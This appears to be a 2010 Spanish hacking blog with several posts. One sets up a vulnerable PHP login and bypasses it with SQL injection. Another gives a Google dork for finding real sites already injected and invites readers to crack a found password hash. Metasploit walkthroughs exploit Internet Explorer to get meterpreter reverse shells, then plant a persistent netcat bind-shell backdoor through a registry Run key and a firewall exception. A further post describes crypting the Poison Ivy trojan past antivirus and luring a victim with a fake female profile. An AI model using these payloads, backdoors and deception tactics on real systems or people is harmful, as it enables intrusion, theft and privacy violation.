Una vez hecho esto guardamos, abrimos otra shell, como usuario comun y creamos la carpeta www en nuestro home

$mkdir /home/magnobalt/www

Listo con esto tenemos configurado para que apache venga a leer a esta carpeta y busque los archivos para ejecutar en el servidor. Aquí es donde vamos a colocar nuestro archivos html, js, php, css, etc.
Para alzar los servicios de lampp hacemos lo siguiente como r00t.

#/opt/lampp/lampp start
Starting XAMPP for Linux 1.7.2...
XAMPP: Starting Apache with SSL (and PHP5)...
XAMPP: Starting MySQL...
XAMPP: Starting FTP ..
XAMPP for Linux started.

Con esa informacion significa que todos los servicios estan corriendo sin problemas, en caso de que haya problema les avisara con una leyenda, pero si no tocaron nada todo correra perfectamente.
Para poder empezar podemos ir a nuestro navegador y escribir http://localhost o http://127.0.0.1, lo cual es la ip de loopback, osea que ingresamos a nuestra propia maquina,
como nos tenemos ningun archivo index,html, index.php etc, todavia en nuestro DocumentRoot en mi caso /home/magnobalt/www, seguramente mostrara seguramente un error 403 Fordiben.
Para poder ingresar al PhpMyAdmin colocamos en el browser http://localhost/phpmyadmin, se daran cuenta que entra directamente, eso es por que al instalar lampp, la contraseña del usuario root en mysql esta en blanco, Obivamente esto no deberia quedar asi, se tendria que colocar una, pero aqui obviaremos.

Primer SQL Injection:

Lo que primero vamos a realizar es un bypass a un login, esta inyeccion es la mas facil de entender, ¿Bypass WTF!!?. El termino Bypass significa saltarse algun tipo
de seguridad, por ejemplo, si un programador me coloca en una funcion que una variable no acepte numeros enteros, y yo de alguna forma logro que la aplicacion
tome numeros enteros, estoy bypaseando (saltando) la seguridad del programador. :)

Lo que haremos es crear un Panel de Administrador, donde pedira usuario y contraseña, pero antes que nada para esto nesesitamos crear una Base de Datos, y una tabla
llamada Usuarios. Para ellos usaremos el PhpMyadmin.

En la imagen se puede observar como estamos creando una tabla llamada usuarios con los compos, id, usuario, password, nombre y correo. EL campo id es nuestra clave y es incremental.

En SQL seria de esta forma:

    CREATE TABLE `hacking`.`usuarios` (
`id` INT( 2 ) NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`usuario` VARCHAR( 20 ) NOT NULL ,
`password` VARCHAR( 20 ) NOT NULL ,
`nombre` VARCHAR( 35 ) NOT NULL ,
`correo` VARCHAR( 50 ) NOT NULL
) ENGINE = MYISAM ;

Ahora que tenemos la tabla, vamos a crear los archivos php, como el panel siempre esta en una carpeta
llamada, admin, administrador, administrator etc. Vamos a crear una carpeta llamada admin en nuestro DocumentRoot que va hacer donde vamos a guardar los archivos del Login, lo cual quedaria /home/magnobalt/www/admin

Los archivos que vamos a nesesitar van hacer index.php, login.php y estilo.css

index.php


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<title>Hacking Nea</title>

<link rel="STYLESHEET" type="text/css" href="../estilo.css">



<body>

<div id="contenedor">

<div id="encabezado">





</div>

<!--fin de encabezado-->



<div id="menu">





</div>



<div id="areatexto">



<div id="cuadrodialogo">

<h1><b>Sistema de Logueo ZamBonet</b></h1>

<form action="login.php" method="post">



<br>Nombre:

<br>

<input type="text" name="nombre" maxlength="8">

<br>

<br>

Contrasena:

<br>

<input type="password" name="pass" maxlength="80">

<br>

<input type="submit" value="Enviar">



</form>



</div>





</div>

<!--fin areatexto-->











<div id="pie">

<!--fin pie-->

</div>

<!--fin contenedor-->





</body>

</html>

Este archivo es el formulario que pedira al usuario que ingrese el usuario y el password, el cual los datos ingresados son procesados por un archivo llamado login.php.

login.php

<?php

$hostname = "localhost";

$database = "hacking";

$username = "root";

$password = "";

$conexion = mysql_connect($hostname, $username, $password) or die ('Error conexion'.mysql_error());



$usuario=$_POST['nombre'];

$password=$_POST['pass'];



mysql_select_db($database,$conexion);

$sql="SELECT * FROM usuarios WHERE usuario='$usuario' AND password='$password'";

echo "Esta es la Consulta: ".$sql;

echo "<br>";echo "<br>";



$login=mysql_query($sql,$conexion) or die ('Error en la consulta'. mysql_error());



$row=mysql_fetch_array($login);

if(isset($row) && !empty($row)){ //verifico que la variable $row tenga informacion

echo "<br>";

echo "<h1><b>ACCESO PERMITIDO<b></h1>";

echo "<br>";

echo "Estos son tus datos";

echo "<br>";echo "<br>";

echo "Usuario: ".$row['usuario'];

echo "<br>";

echo "Password: ".$row['password'];

echo "<br>";

echo "Email: ".$row['correo'];

}

else

{

echo "<h1><b>ERRORRRRRR PAYASO <b></h1>";

}



?>

Las primeras lineas es la conexion de la base de datos, la base de datos que contiene la tabla Usuarios, que creamos anteriormente esta en una llamada Hacking, uds quizas la llamaron de otra forma, el usuario que esta realizando las consultas es r00t (super usuario de MySQL) , lo cual es un grave error esto nunca deberia suceder se tendria que crear un usuario con privilegios que la aplicacion nesesitara, r00t corre con todos los privilegios y solo se tendria que utilizar para tareas administrativas. En la practica es raro encontrar este caso pero se encunetran, mas en los lugares donde tienen un servidor dedicado para ellos, y lo montan sin conocimientos y dejan a los servicios por default.
Nosotros vamos a correr nuestra web con r00t para que se vea lo peligroso que es y la potencia de SQL injection con estos privilegios.
Tambien se nesesita un arhicovo .css llamado estilo.css lo puden copiar desde aca, y lo guardan en la carpeta www en mi caso /home/magnobalt/www, este archivo es la maquetacion del sitio.

Ahh me olvidaba antes de empezar con el siguiente paso que es la practica, carguen algun registro en la tabla usuario, yo coloque como usuario admin y contraseña 123456, y otro magno y contraseña qwerty carguen lo que se le ocurra.

Por fin Accion
Si todo va correctamente uds al dirigirse a http://localhost/admin, le mostrara esta pantalla.

Es el formulario donde pide el usuario y contraseña para ingresar a un area restringida, si el usuario es ingresado incorrectamente mostrara esta pantalla.

saldra la leyenda de "ERORRRRRR PAYASO" y mas arriba que esta lo interesante, es la consulta que es pasada al DBMS que en este caso es el MySQL, con esta leyenda vamos a ir observando lo que va pasando al inyectar codigo.

Si el usuario es correcto saldra esta pantalla

Como veran la sentencia SQL se sigue mostrando arriba, lo unico que hace es que si tenemos acceso sale la Leyenda "ACCESO PERMITIDO" y nos muestra los datos del Usuario.

¿Donde esta el Bug?

El error de en el codigo se encuentra en que no se filtra las variables pasadas por el formulario y se pasan automaticamente a la consulta SQL.

$usuario=$_POST['nombre'];
$password=$_POST['pass'];
$sql="SELECT * FROM usuarios WHERE usuario='$usuario' AND password='$password'";

Estas son las lineas del problema, como veran lo que nos pasa por el formulario, el usuario y password
lo llevamos a la variable $usuario y $password, luego automaticamente sin colocar alguna seguridad
lo volcamos a la consulta SQL
Si yo colocaria como nombre admin y password 123456, la consulta arrojara un TRUE y traeria datos de
la base de datos ya que para el usuario admin el password es 123456. Se veria asi


SELECT * FROM usuarios WHERE usuario='admin' AND password='123456'

Los string en MySQL son delimitados por ' (comilla simple), osea que todo lo que esta encerrados entre dos ' MySQL lo toma como string. Para poder inyectar en este caso, nosotros tendriamos que escaparnos de la comilla, simple y luego ahi colocar sentencias SQL. Para entender mejor veamos el ejemplo.
Que pasaria si en vez de colocar un nombre por ejemplo magno yo pondria una comilla simple, la consulta quedaria de este modo ( Esto se puede ir probando en su labs y cada vez que ingresen se mostrara la sentencia SQL que se esta mandando al MySQL )

SELECT * FROM usuarios WHERE usuario=''' AND password=''

Se puede ver que en el campo usuario, hay 3 comillas, las dos de afueras son las que el programador coloco para delimitar lo que ingresa el usuario como string, y la del medio es nuestra comilla simple que acabamos de enviar, lo cual arroja el siguiente error

Error en la consultaYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND password=''' at line 1

MySQL se esta quejando diciendo que hay un error de sintaxis mas precisamente hay una comilla simple sin cerrar. Esto significa que esa comilla simple esta siendo interpretada como codigo SQL para el DBMS, ahi esta lo interesante.

Ataque 1
Podemos lograr sin saber el password ni el usuario de alguien ingresar como el primer registro de nuestra tabla Usuarios. ¿Como? coloquemos como usuario, 'or 1=1-- , (Coloquen un espacio despues del --)
la consulta quedara de este modo

SELECT * FROM usuarios WHERE usuario=''or 1=1-- ' AND password=''

sin saber ni el usuario ni la contraseña entramos como admin.. ;)

Estudiemos un poco lo que hicimos, al ingresar 'or 1=1-- . La comilla ingresada por nosotros cumple la funcion de cerrar la primer comilla del programador es decir quedaria asi '', con eso ya podemos colocar sentencias SQL ya que no estamos dentro de la comillas simples, entonces viene esto or 1=1, la sentencia or significa que si algo es verdadero entonces todo es verdadero, y como 1=1 es verdadero entonces toda nuestra consulta sera verdadera por mas que no hallamos dicho el usuario es igual a '' (osea nada). Or se comporta de esta forma

1- V or V = Verdadero
2- V or F = Verdadero
3- F or V = Verdadero *
4- F or F = Falso

En nuestro caso se comportaria como la linea numero 3, osea Falso or Verdadero. Luego viene lo que es -- ' AND password=''
, -- en sql es comentario por lo que entonces todo lo que viene despues de ahi se lo toma como comentario, esto nos permite decirle al DBMS que lo que sigue, osea ' AND password='', lo tome como un comentario. Matamos la ' simple que sobraba puesto por el programador y la parte donde pide que el password se = a lo que ingresa el usuario :)

Ataque 2

En el ataque anterior podiamos ingresar sin saber el usuario ni el password, pero caemos solamente en el primer registro de la tabla en cuestion (Usuarios).
Podemos dirigirnos a un registro conociendo el usuario y sin saber la contraeña, para ello casi siempre los administrador colocan admin, administrador etc, como nombres de usuarios, yo en mi tabla tengo un usuario admin. Entonces inyectamos y entramos como el usuario sin saber su contraseña. En usuario colocamos admin'-- , quedando la consulta SQL

SELECT * FROM usuarios WHERE usuario='admin'-- ' AND password=''

ingresamos como admin sin saber el password :)

y como magno :)

estudiemos un poco lo que hicimos, ingresamos admin'-- la palabra admin es tomada como string ya que va a estar delimitada por la primer comilla del programador mas la comilla que ingresamos siguiendo a ella admin'. Quedando de este modo 'admin', luego el -- realiza la misma funcion que anteriormente dejando en comentario la comilla que sobra mas la sentencia donde pide el password.

La solucion

Cuando empazamos este ejemplo dijimos que la forma de poder inyectar era poder escapar de la limitaciones de la comilla simple, osea que si nosotros podemos llegar a lograr que si el usuario cuando coloque una comilla simple lo trasforme a otra cosa, el usuario ingrese lo que ingrese siempre quedara dentro de las comillas simples que el programador coloco.
Para ello tenemos formas de filtrar comillas, tenemos del lado del servidor y del lado de la aplicacion

Lado del Servidor

Una funcion muy popular es la Magic_quotes, que se encuentra en el archivo php.ini (en nuestro caso con lampp esta en /opt/lampp/etc ). Lo que realiza esta funcion es colocar automaticamente slashes, a las variables que se pasan por $_POST y $_GET. Para que sirve esto es practicamente para poder impedir las SQL injection aunque desde las versiones de PHP 5.3.0, vienen desactivadas mas info.
Para poder activar esta funcionalidad tendremos que editar el archivo php.ini, para ello nos dirigimos a la carpeta de configuracion de lampp

#cd /opt/lampp/etc
#cp php.ini php.ini.backups
#nano php.ini

y buscamos esta linea

magic_quotes_gpc = Off

Y lo ponemos en On

magic_quotes_gpc = On

Luego reiniciamos apache para que tome los cambios

#/opt/lampp/lampp restart

Ahora si quisieramos inyectar las comillas simples ' nos trasformara a esto \',
Osea que si yo ingreso nuevamente para bypasear dicho login la consulta se vera asi.

SELECT * FROM usuarios WHERE usuario='\'or 1=1-- ' AND password=''

Por lo que siempre vamos a quedarnos encerrados entres las comillas simples del programador, por lo cual ingresemos lo que ingresemos siempre nuestro datos seran tomados como un string comun :).

Lado de la Aplicación

Del lado de la aplicacion tambien existen funciones que nos permiten agregar slashes, y recomiendan usar esta funcion antes que las magic_quotes.
Addslashes, es una funcion de php que nos permite actuar de forma similar a las magic_quotes, escapando ',",\ y NULL.
Para que nuestro codigo sea capas de poder filtrar esas comillas agregaremos esta funcion a la variable que llegan desde el usuario y son pasadas para el DBMS. El codigo seguro quedaria de este modo


$usuario=$_POST['nombre'];
$password=$_POST['pass'];
$usuario= addslashes($usuario);
$password= addslashes($password);
$sql="SELECT * FROM usuarios WHERE usuario='$usuario' AND password='$password'";

Con esto logramos filtrar las comillas logrando la misma funcionalidad de magic_quotes. Recomiendo leer sobre la funcion mysql_ real_ escape_ string.
Aqui no esta pero el password se deberia guardar en Base de Datos en forma encriptada usando alguna funcion de hash como ser MD5, SHA1 etc, o algun otro algoritmo. Tambien se puede crear una funcion que al password pase 6 o N veces por la funcion HASH asi que si alguien puede verlo no pueda ser roto de forma facil con fuerza bruta o diccionario.
Por ejemplo el md5 para 123456 es e10adc3949ba59abbe56e057f20f883e, si alguien puede obetener este hash, podria pasarlo por algun diccionario que existen en la web. Una buena tools para esto es la que codeo Daniel ver aqui. Ese hash podemos ver que es facil de romper con diccionario.

El mismo password del usuario 123456, pasado 6 veces por la funcion md5 seria 74e59720dd08b1db45f7152d082c5051 , y pasada por el bruteador

Observamos dos cosas, que hay una baja taza de deteccion, y que el diccionario alimamed.pp.ru, nos mato nuestra seguridad jaja xD...

Proximas Entregas

La proxima entrega se realizara los ataques a las variables de tipo $_GET, y veran que si el dato es un entero no se nesesita la comilla simple, dependiendo de la programacion!. Se vera como detectar que la aplicacion es vulnerable y como explotar con la clausula UNION y luego como solucionar.
Y la ultima entrega se veran las SQL injection mas avanzadas que son las que permiten comprometer al HOST.
Tambien podria hacer una cuarta entrega para hablar sobre BLIND SQL, y un DOS a travez de SQL injection.

Sql Injection Cache Google

2010-04-13T00:32:00.000-07:00

Todos sabemos que Mr. Google es una herramienta fabulosa, y que todos los dias lo usamos para realizar busquedas de cualquier tipo. En este caso la busqueda es algo rebuscada, por asi decirlo, la cuestion es que colocando una dork, con un cadena de texto con sentencias SQL podemos obetener SQLi ya provocadas por otras personas.
La cuestion es que si lo que hace Google esta bien, ¿por que no ponen una restrincion a bug como ser SQL, XSS, RFI, LFI etc.. etc...?
Pero Google no se puede hacer cargo de lo que pasa a cada web del mundo, los que se deberian hacerse cargo son los Webmaster de sus propias paginas, para mas hay mucha informacion en la web de como sanear una consulta SQL para no caer en un SQL INJECTION.

Busqueda

La busqueda se realiza con ayuda de Hacking Google de una forma sensilla:

inurl:UNION SELECT 1,2 site:com.ar

Con esta busqueda lo que hacemos es decir a Google que nos de la web que tengan la cadena "UNION SELECT 1,2" en su URL pero que tambien nos filtre los sitios argentinos "com.ar" :).

Obetenmos algo como esto.

Bueno creo que a todos nos va a llamar la atencion de la Web de jesica.. mmm creo que ya se quien pudo haber hecho la Inyecion.

Vamos al enlace, y vemos que tenemos el usuario y el password encriptado ( por lo menos encripto!!!. ) y por lo visto algo fuertes, probe algunos diccionarios y nada, el que pueda crackearlo que ponga en comentarios si quiere ;).

Ahora tambien se puede ver otra cosa. Hay una seccion que es PREMIUM ;)...
En fin eso los dejo para que el que quiere investigar, tampoco se puede regalar las cosas tan faciles no, para eso ya está Google con su indexacion ja..

Saludos!

Laboratorio - Metasploit - Backdor Persistente + Exploit ie_iepeers_pointer

2010-03-22T11:43:00.000-07:00

El 10 de marzo me llego un mail de Uno al Dia, informando el nuevo 0-day de Internet Explorer, que ataca a las versiones 6 y 7, las versiones 5 y 8 no son afectadas.

Como contramedida seria los que usan IE migrar totalmente hacia la version 8. Estadisticamente de 100 personas aprox. 20 estarian usando las versiones 6 y 7 de de IE, les dejo una imagen

El exploit es un BOF que ataca a la libreria ie_iepeers pudiendo ejecutar codigo arbitrario con privilegios del usuario que esta ejecutando el navegador.
Para poder usarlo desde el metasploit antes realizen un update al freamwork.

#msfupdate

Comenzando

Este post va en dos partes primero el ataque con el exploit ie_iepeers, y luego subir un netcat y dejarlo como backdor persistente en la victima.

Herramientas
Como laboratorio tengo un Debian 5.0 como sistema anfitrion, Windows XP SP 3 - Internet Explorer 6.0 corriendo como sistema huesped, VirtualBOX 3.1.4 r57640, Metasploit Framework Version: 3.3.4-de

Primer Parte
Bueno la carga de los datos es exactamente igual que la forma donde mostre en el post anterior de Metasploit LINK, mostrare todo junto desde la eleccion del exploit, seteo de variables hasta lanzar el exploit.


Magno:/home/magno# msfconsole

          _
                                | |      o     
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_ 
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |  
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|                   
                           \|                   





=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 320 exploits - 99 auxiliary
+ -- --=[ 217 payloads - 20 encoders - 6 nops
=[ svn r8878 updated today (2010.03.22)

msf > use exploit/windows/browser/ie_iepeers_pointer
msf exploit(ie_iepeers_pointer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp          
msf exploit(ie_iepeers_pointer) > set LHOST 192.168.56.1
LHOST => 192.168.56.1          
msf exploit(ie_iepeers_pointer) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1  
msf exploit(ie_iepeers_pointer) > set URIPATH /
URIPATH => /
msf exploit(ie_iepeers_pointer) > show options

Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     192.168.56.1     yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST     192.168.56.1     yes       The local address
LPORT     4444             yes       The local port


Exploit target:

Id  Name
--  ----
0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0


msf exploit(ie_iepeers_pointer) > exploit
[*] Exploit running as background job.
msf exploit(ie_iepeers_pointer) >
[*] Started reverse handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.

Vemos que el atacante tiene como ip 192.168.56.1, ahora quedaria que la victime ingrese a la direccion http://192.168.56.1:8080, el cual es la pagina maliciosa hecha por el metasploit, donde si cumple los requisitos de dicho exploit se ejecutara el payload en la maquina victima.

Entonces ingresamos

En la consola del metasploit podemos ver como se ejecuto y tenemos una sesion de meterpreter.


msf exploit(ie_iepeers_pointer) >
[*] Started reverse handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
[*] Sending Internet Explorer iepeers.dll Use After Free to 192.168.56.101:1034...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1035)
[*] Session ID 1 (192.168.56.1:4444 -> 192.168.56.101:1035) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1364)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 188
[*] New server process: notepad.exe (188)

msf exploit(ie_iepeers_pointer) > sessions -l

Active sessions
===============

Id  Type         Information                                  Connection
--  ----         -----------                                  ----------
1   meterpreter  VICTIMA-55919B2\victima 2 @ VICTIMA-55919B2  192.168.56.1:4444 -> 192.168.56.101:1035

msf exploit(ie_iepeers_pointer) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VICTIMA-55919B2
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: es_ES
meterpreter >

Segunda Parte

Una vez obtenido una sesion lo que vamos hacer es interactuar con la victima con el meterpreter. El proceso de este backdor es muy simple consisten en subir el netcat dejando en escucha un puerto con una cmd.exe , y colocando una exepcion en el firewall ya que la conexion sera de tipo bind.

Subimos el netcat
Para ello tenemos que tener el netcat para windows, yo lo tengo en la carpeta de mi /home/ y lo subiremos en la carpeta de system32, la sentecia quedaria asi.



meterpreter > upload /home/magno/nc.exe c:\\windows\\system32
[*] uploading  : /home/magno/nc.exe -> c:\windows\system32
[*] uploaded   : /home/magno/nc.exe -> c:\windows\system32\nc.exe

Luego agregaremos una clave en el registro de windows para que arranque netcat escuchando el puerto 1234 con el cmd.exe, de forma daemon -d.


meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
-v realtek -d 'C:\Windows\System32\nc.exe  -L -d  -e cmd.exe -p 1234'
Successful set Hacked.

Ahora nos quedaria agregar una exepcion en el firewall de windows, de la victima, para ello pedismos una shell en el metrpreter y ejecutamos los comandos como se muestran.


meterpreter > execute -f cmd.exe -i -H                                                                                            
Process 560 created.                                                                                                              
Channel 3 created.                                                                                                                
Microsoft Windows XP [Versi�n 5.1.2600]                                                                                           
(C) Copyright 1985-2001 Microsoft Corp.                                                                                           

C:\Documents and Settings\victima 2\Escritorio>netsh firewall add portopening ALL 1234 "c:\windows\system32\nc.exe"
netsh firewall add portopening ALL 1234 "c:\windows\system32\nc.exe"
Aceptar


C:\Documents and Settings\victima 2\Escritorio>netsh firewall show portopening
netsh firewall show portopening

Configuraci�n de puerto para el perfil Est�ndar:
Puerto Protocolo Modo          Nombre
-------------------------------------------------------------------
1234   TCP       Habilitar     c:\windows\system32\nc.exe
1234   UDP       Habilitar     c:\windows\system32\nc.exe


C:\Documents and Settings\victima 2\Escritorio>^C
Terminate channel 3? [y/N]  y
meterpreter > reboot
Rebooting...

El comando netsh nos permite setear configuraciones del firewall de windows, lo que hacemos es agregar una exepcion para el programa netcat, en el puerto 1234, para UDP y TCP, y como muestra despues podemos ver que estan colocadas las expeciones con el comando netsh firewall show portopening
Apretamos Crtl + c, no da el meterpreter y reiniciamos la computadora de la victima.
Ahora Fijense como la victima esta escuchando el puerto 1234

Solamente nos queda verificar e ingresar con el netcat a la victima de esta forma.

Eso es todo, Saludos

Kubuntu + wicd + PRO/Wireless 3945ABG Intel

2010-03-16T13:17:00.000-07:00

Bueno hoy estuve instalando Kubuntu 9.10 en mi notebook, sin ningún problema hasta el momento de poder conectarme a la Wifi, resulta que por default me trajo el Network-Manager como administrador de conexion de redes, y al verificar la existencia de una red no la veia. Mi placa de red wifi es una INTEL modelo PRO/Wireless 3945ABG, ahora el problema radicaba que la placa por cable no me anda, no toma ip entonces mi única solución siempre es la wifi.
Un amigo me dijo que el usaba el wicd, asi que me decidi descargar, el tema radicaba en que no tenia internet entonces tuve problemas con las dependencias, tenia que irme a W$ y descargar las dependencias muchas veces ida y vuelta.
El que tenga un problema similar quizás esto le puede ayudar, voy a colocar la lista de los paquetes que tube que descargar para que el wicd me funcione correctamente, y este corriendo en el kubuntu :).

Pasos:

Descargarse el wicd formato .deb para ubuntu desde aqui.

Antes de instalar hay que desinstalar el Network-Manager

#aptitude remove network-Mmanager

Las siguientes dependecias me arrojaba a mi.

wicd depende de python-gtk2; sin embargo: El paquete `python-gtk2' no está instalado. wicd depende de python-glade2; sin embargo: El paquete `python-glade2' no está instalado. wicd depende de python-urwid; sin embargo: El paquete `python-urwid' no está instalado.

Empezando a buscar uno por uno me resultaron algunos problemas, ya que un paquete depende siempre de otro y así, y tenia que reiniciar la pc para ir a W$ a buscar los nuevos paquetes, así que le dejo los pasos que realize hasta que el wicd termino corriendo sin problemas en Kubuntu.

#dpkg -i python-cairo_1.8.6-1ubuntu1_i386.deb
#dpkg -i python-gtk2_2.14.1-1ubuntu1_i386.deb
#dpkg -i libglade2-0_2.6.4-1_i386.deb
#dpkg -i python-glade2_2.14.1-1ubuntu1_i386.deb
#dpkg -i python-urwid_0.9.8.4-1_i386.deb

Y por ultimo instala el Wicd de la misma forma con el dpkg

#dpkg -i wicd_1.6.2.2-1_all.deb

Esa secuencia de paquetes fue la que me resulto, acá pueden encontrar la mayoría de los paquetes otros quizás tiene que googlear un rato. LINK

Saludos

Peligro Ingenieria Social

2010-03-07T19:19:00.000-08:00

Bueno despues de un tiempo sin postear vuelvo con un temita que esta interesante, y es muy amplio, el cual es la Ingeniería Social. Este ataque es tan poderoso como un 0 day, pero veamos un poco para lo que no saben de que se trata y para los que saben mostrarle un caso real.
La cuestión principal de este post no es solo informar si no alarmar y que después de esto no estén tan seguros de tener un AV actualizado con todas las firmas al día, prevenirse ya que en Internet uno no sabe quien es el que esta del otro lado de la PC :).

Según mi visión ¿Que es la Ingeniería Social?
La Ingeniería Social es una técnica la cual consiste en poder engañar a una persona haciéndose pasar por: una persona de confianza de la víctima, una persona al cual le gustaría conocer, una persona atractiva, una persona importante para la víctima, haciéndose pasar por la víctima etc etc etc ... con el objetivo de poder entrar en su espacio de confianza y sacar información confidencial como sus contraseñas, documentos, archivos etc.

Comenzando

Creo que unas de las formas mas fáciles de engañar a un hombre es haciéndose pasar por una mina que este buena, muy buena :p. Los pasos son fáciles se consigue fotos de una chica en particular, un facebook y un correo. Esto es la técnica del engaño así que a imaginarse.!!

Ahora podemos preparar algo como un buen troyano (en este ejemplo el Poison Ivy) pasado por un crypter para que quede indetectable, las imagenes siguientes muestran el antes y el después del Crypter..

Antes

Despues

Ahora vean como un troyano tan conocido no es detectable por ninguno de los AV, ahora uds se imaginaran los seguros que deben estar con AV, pues es una herramienta mas que tiene que acoplarse a todo el proceso de seguridad, pero no es la salvación segura.
Fijense el grado de peligrosidad, no es solo una cuestión de ver las letras verdes, si no a lo expuesto que estamos al no tener conocimientos de estas cosas, y esto es solo la punta del iceberg.!!!

Ahora como nuestra víctima no pudo con su genio de ganador, empezó a caer en el histeriqueo propio de una chica adolecente!! ( Vale aclarar que la victima ah sido un amigo, y el nunca sabia de todo el trabajo que habia atras, obviamente despues le comente que eh sido yo.!! Casi pierdo su Amista!! ja naaa..! ). Veamos la conversacion

Creo que la imagen lo dice todo, un buen acceso a su maquina mediante el troyano, mas el peligro que esto acarrea robos de sus cuentas, de sus archivos, robo de lo mas importante la INTIMIDAD, hablando de INTIMIDAD de lo que es nuestro no de mi novia, mujer etc.
No espero como dije al principio que este articulo sea una forma solo de informar si no tambien de alertar y aportar algo de conocimientos con uds, por que a cualquiera nos puede pasar esto, entre otras cosas..!

Por ultimo dejo los 4 items que segun Kevin Mitnick la Ingenieria Social tiene exito

1. Todos queremos ayudar.
2. El primer movimiento es siempre de confianza hacia el otro.
3. No nos gusta decir No.
4. A todos nos gusta que nos alaben.

Saludos

Laboratorio -- Metasploit - Exploit ie_aurora

2010-02-09T19:30:00.001-08:00

Bueno creo que todos deben conocer del 0 day que tanto se hablo en estos ultimos tiempos sobre IE, lo que lograba un BOF pudiendo inyectar codigo arbitrario obteniendo una shell, aunque no todos son vulnerables hay una tablita que muestra que tan bien estan parados algunas versiones de windows conjuntamente con la version de IE, mas ahora sabiendo que los antivirus lo detectan..

Imagen de http://elladodelmal.blogspot.com/

El laboratorio se compone por una Virtual Machin ( VirtualBox, en el proximo post voy a explicar como intalarlo con yapa de Hacking! ) que tiene intalado un Windows XP SP3 con internet explorer Version 6.0, el cual es totalmente vulnerable. Por suerte es muy raro encontrar clientes navegando con esa version, pero .... :). Je..

Comenzando

Primero entonces nesesitamos el metasploit, lo podemos descargar desde aqui, busquen su arquitectura para linux hay de 32 bit y 64 bit (Yo me descargue este framework-3.3.3-linux-x86_64.run), tambien esta para windows pero el ultimo que baje no tenia el exploit aurora, pero se le puede agregar descargando el archivo con estension rb y colocarlo en la carpeta de exploit/windows/browser que seria lo ideal. Aqui el exploit.
Una vez intalado el metasploit, y que todo haya salido bien ( En linux nesesitamos intalar ruby ), nos dirigimos a la consola de metasploit.

/home/usuario# msfconsole

                                  _       _
_                   | |     (_)_
____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
       |_|


=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 320 exploits - 99 auxiliary
+ -- --=[ 217 payloads - 20 encoders - 6 nops
=[ svn r8438 updated yesterday (2010.02.09)

msf >

Una vez dentro de la consola de Metasploit, tenemos que elegir el exploit a utilizar

msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) > show options

Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     0.0.0.0          yes       The local host to
listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

Id  Name
--  ----
0   Automatic

Una vez cargado el exploit con el comando use, podemos ver los argumentos que nesesita el exploit para poder funcionar con el comando show options.
Usaremos un PAYLOAD de reverse shell, para ello colocamos lo que sigue.

 msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

Bien empezamos a llenar los argumentos tanto del Payload como del EXPLOIT

msf exploit(ie_aurora) > set LHOST 190.18x.xxx.xxx
LHOST => 190.18x.xx.xxx
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > show options

Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     0.0.0.0          yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST     190.18x.xx.xxx   yes       The local address
LPORT     4444             yes       The local port


Exploit target:

Id  Name
--  ----
0   Automatic

En la pantalla se ve como se setearon los valores cargados LHOST vendria a ser la ip del atacante. Largamos el exploit

msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started reverse handler on 190.18x.xx.xxx:4444
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://190.18x.xx.xxx:8080/
[*] Server started.

